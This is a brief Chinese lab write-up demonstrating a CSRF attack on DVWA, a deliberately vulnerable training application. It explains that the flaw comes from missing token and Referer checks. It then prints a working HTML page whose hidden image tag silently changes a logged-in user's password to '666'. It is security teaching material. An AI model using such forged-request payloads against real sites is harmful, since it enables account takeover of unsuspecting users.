实验环境:DVWA、Apache
实验原理:
CSRF漏洞是因为web应用程序在用户进行敏感操作时,如修改账号密码、添加账号、转账等,没有校验表单token或者http请求头中的referer值,从而导致恶意攻击者利用普通用户的身份(cookie)完成攻击行为
实验内容:
实验一:修改密码(低级别DVWA)
1.构造一个网址:http://192.168.1.101/1.html
html代码如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<img hidden src="http://localhost/DVWA-master/vulnerabilities/csrf/?password_new=666&password_conf=666&Change=Change#" alt="">
</script>
</body>
</html>
2.当用户点击该网址时,DVWA密码就会被改成“666”,以下是登录成功界面